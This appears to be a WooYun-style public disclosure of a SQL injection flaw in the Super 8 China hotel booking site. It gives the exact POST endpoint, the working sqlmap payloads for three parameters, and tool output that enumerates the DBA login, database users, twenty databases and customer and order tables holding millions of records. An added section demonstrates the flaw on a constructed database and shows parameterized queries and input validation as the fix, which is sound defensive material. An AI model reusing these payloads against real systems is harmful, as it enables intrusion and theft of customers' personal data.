2015-09-23: Details were reported to the vendor and are awaiting the vendor's handling.
2015-09-28: The vendor has actively ignored the vulnerability; details are disclosed to the public.
Almost a month ago I captured the traffic, tested it and found an injection, but never submitted it. I am retesting now so I can submit it. After this long, hopefully it won't duplicate someone else's report!~~~
Capture the traffic at http://cp.super8.com.cn/Hotel/List or http://cp.super8.com.cn/
http://cp.super8.com.cn/Hotel/HotelList (POST)
stime=2015-09-01&etime=2015-09-02&roomnum=1&citycode=110100&keycode=228&servercs=&honour=&pageindex=1&sorttype=1&landMrk=&djq=&pagesize=9
The citycode, honour and servercs parameters are injectable (the parameters in the cookie and the referer could also be tested for injection!~~~)
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: honour
    Type: error-based
    Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause
    Payload: stime=2015-09-01&etime=2015-09-02&roomnum=1&citycode=110100&keycode=228&servercs=&honour=-4628) OR 7763=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(106)+CHAR(104)+CHAR(113)+(SELECT (CASE WHEN (7763=7763) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(112)+CHAR(102)+CHAR(113))) AND (4155=4155&pageindex=1&sorttype=1&landMrk=&djq=&pagesize=9

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
    Payload: stime=2015-09-01&etime=2015-09-02&roomnum=1&citycode=110100&keycode=228&servercs=&honour=-4048) OR 3047=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND (8777=8777&pageindex=1&sorttype=1&landMrk=&djq=&pagesize=9

Place: POST
Parameter: citycode
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: stime=2015-09-01&etime=2015-09-02&roomnum=1&citycode=110100') AND 2424=2424 AND ('aDZF'='aDZF&keycode=228&servercs=&honour=&pageindex=1&sorttype=1&landMrk=&djq=&pagesize=9

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: stime=2015-09-01&etime=2015-09-02&roomnum=1&citycode=110100') AND 3376=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(106)+CHAR(104)+CHAR(113)+(SELECT (CASE WHEN (3376=3376) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(112)+CHAR(102)+CHAR(113))) AND ('QfCW'='QfCW&keycode=228&servercs=&honour=&pageindex=1&sorttype=1&landMrk=&djq=&pagesize=9

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
    Payload: stime=2015-09-01&etime=2015-09-02&roomnum=1&citycode=110100') AND 7647=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND ('iwOc'='iwOc&keycode=228&servercs=&honour=&pageindex=1&sorttype=1&landMrk=&djq=&pagesize=9

Place: POST
Parameter: servercs
    Type: error-based
    Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause
    Payload: stime=2015-09-01&etime=2015-09-02&roomnum=1&citycode=110100&keycode=228&servercs=-6013) OR 1049=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(106)+CHAR(104)+CHAR(113)+(SELECT (CASE WHEN (1049=1049) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(112)+CHAR(102)+CHAR(113))) AND (3379=3379&honour=&pageindex=1&sorttype=1&landMrk=&djq=&pagesize=9

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
    Payload: stime=2015-09-01&etime=2015-09-02&roomnum=1&citycode=110100&keycode=228&servercs=-1418) OR 3789=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND (5903=5903&honour=&pageindex=1&sorttype=1&landMrk=&djq=&pagesize=9
---
[01:57:05] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: citycode, type: Single quoted string (default)
[1] place: POST, parameter: honour, type: Unescaped numeric
[2] place: POST, parameter: servercs, type: Unescaped numeric
[q] Quit
> 0
[02:00:23] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2012
[02:00:23] [INFO] fetching current user
[02:00:23] [INFO] resumed: sa
current user: 'sa'
[02:00:23] [INFO] fetching current database
[02:00:23] [INFO] resumed: crs2
current database: 'crs2'
[02:00:23] [INFO] testing if current user is DBA
current user is DBA: True
database management system users [17]:
[*] ##MS_AgentSigningCertificate##
[*] ##MS_PolicyEventProcessingLogin##
[*] ##MS_PolicySigningCertificate##
[*] ##MS_PolicyTsqlExecutionLogin##
[*] ##MS_SmoExtendedSigningCertificate##
[*] ##MS_SQLAuthenticatorCertificate##
[*] ##MS_SQLReplicationSigningCertificate##
[*] ##MS_SQLResourceSigningCertificate##
[*] crstemp
[*] NT AUTHORITY\SYSTEM
[*] NT Service\MSSQLSERVER
[*] NT SERVICE\SQLSERVERAGENT
[*] NT SERVICE\SQLWriter
[*] NT SERVICE\Winmgmt
[*] PHHXAPP12\Administrator
[*] sa
[*] super8crs
available databases [20]:
[*] crs2
[*] crs3
[*] crs_all
[*] crs_report
[*] FHS_SRC
[*] ipegasus3
[*] ipegasus3_empty
[*] ipegasus3_test
[*] ipegasus_gresall
[*] ipegasus_history
[*] ipegasus_mirro
[*] ipegasus_test125
[*] master
[*] model
[*] model2
[*] msdb
[*] s8_new
[*] s8_ws
[*] Super8_DW
[*] tempdb
Database: crs2
| Table                    | Entries |
| dbo.Cu_CustomerInfo      | 5059428 |
| dbo.Cu_AvailableCard     | 5232807 |
| dbo.customertemp         | 4147436 |
| dbo.Order_GstInfo        | 1271902 |
| dbo.Order_OptInfo        | 1175851 |
| dbo.Order_Info           | 1163925 |
| dbo.Order_StatisticsInfo | 1163925 |
| dbo.Weixin_Mapping       | 524954  |
| dbo.Order_Email          | 196106  |
| dbo.customermobile       | 139662  |
| dbo.CC_CorpCustomer      | 122552  |
| dbo.Cu_CustomerLog       | 24126   |
| dbo.PMS_User             | 942     |
| dbo.UP_User              | 519     |
Only a portion of the data was dumped as proof, as shown in the figure below!~~~
The other databases can also be read; I did not go further!~~~
As described above
Fix: filter the input
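To make the "filter the input" recommendation concrete, here is an added example that is not part of the original report and not the site's code. It reconstructs the shape of query that the reported citycode payload (a closing quote and parenthesis, a boolean condition, then a reopened quoted string) is built for, shows how the true/false variants change the result set when the value is spliced into the SQL text, and contrasts that with a parameterized query plus strict per-parameter validation. The hotel table, its rows and the six-digit citycode format are constructed assumptions; an in-memory SQLite database stands in for the SQL Server 2012 backend named in the sqlmap output, and the same parameterized form applies to SqlCommand parameters in ASP.NET.

```python
import re
import sqlite3

# Constructed sample rows standing in for the hotel list; not the site's real schema or data.
SAMPLE_HOTELS = [
    ("110100", "Hotel A"),
    ("110100", "Hotel B"),
    ("310100", "Hotel C"),
]

# The boolean-based payload sqlmap reported for citycode (true condition) and a false
# variant, which is how a blind injection infers one bit per request.
PAYLOAD_TRUE = "110100') AND 2424=2424 AND ('aDZF'='aDZF"
PAYLOAD_FALSE = "110100') AND 2424=2425 AND ('aDZF'='aDZF"


def make_db():
    """Fresh in-memory database with the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE hotels (citycode TEXT, name TEXT)")
    conn.executemany("INSERT INTO hotels VALUES (?, ?)", SAMPLE_HOTELS)
    return conn


def vulnerable_hotel_list(conn, citycode):
    """Assumed shape of the original query: the request value is spliced into a quoted,
    parenthesised WHERE term, so the payload's ') ... (' fragments line up with the
    surrounding syntax and the attacker's condition becomes part of the query."""
    sql = "SELECT name FROM hotels WHERE (citycode='%s') ORDER BY name" % citycode
    return [row[0] for row in conn.execute(sql)]


def safe_hotel_list(conn, citycode):
    """Parameterized version: the value is bound as data, never parsed as SQL, so the
    payload string simply matches no row."""
    sql = "SELECT name FROM hotels WHERE (citycode=?) ORDER BY name"
    return [row[0] for row in conn.execute(sql, (citycode,))]


# Validation rules for the injectable fields; the formats are assumptions for the example.
# sqlmap classified honour and servercs as "unescaped numeric", so they are treated as
# optional integers rather than free text.
CITYCODE_RE = re.compile(r"^\d{6}$")


def validate_hotel_params(params):
    """Return a cleaned dict of the fields used in the query or raise ValueError.

    Rejecting anything that does not match the expected format is defence in depth on
    top of parameterization; it is not a substitute for it."""
    citycode = params.get("citycode", "")
    if not CITYCODE_RE.match(citycode):
        raise ValueError("citycode must be a six-digit code")
    cleaned = {"citycode": citycode}
    for name in ("honour", "servercs"):
        raw = params.get(name, "")
        if raw == "":
            cleaned[name] = None
        elif raw.isdigit():
            cleaned[name] = int(raw)
        else:
            raise ValueError("%s must be empty or a non-negative integer" % name)
    return cleaned


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, true payload: ", vulnerable_hotel_list(db, PAYLOAD_TRUE))
    print("vulnerable, false payload:", vulnerable_hotel_list(db, PAYLOAD_FALSE))
    print("parameterized, payload:   ", safe_hotel_list(db, PAYLOAD_TRUE))
    print("parameterized, 110100:    ", safe_hotel_list(db, "110100"))
    try:
        validate_hotel_params({"citycode": PAYLOAD_TRUE, "honour": "", "servercs": ""})
    except ValueError as exc:
        print("validation rejected payload:", exc)
```

Running the block shows the two observable states of the vulnerable query (both 110100 hotels for the true payload, an empty list for the false one), which is exactly the difference sqlmap's boolean-based blind technique measures; the parameterized query returns nothing for the payload and the validator refuses it before any query is built.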
Severity: No impact (vendor ignored)
Ignored at: 2015-09-28 09:02
Vulnerability Rank: 15 (WooYun rating)
None yet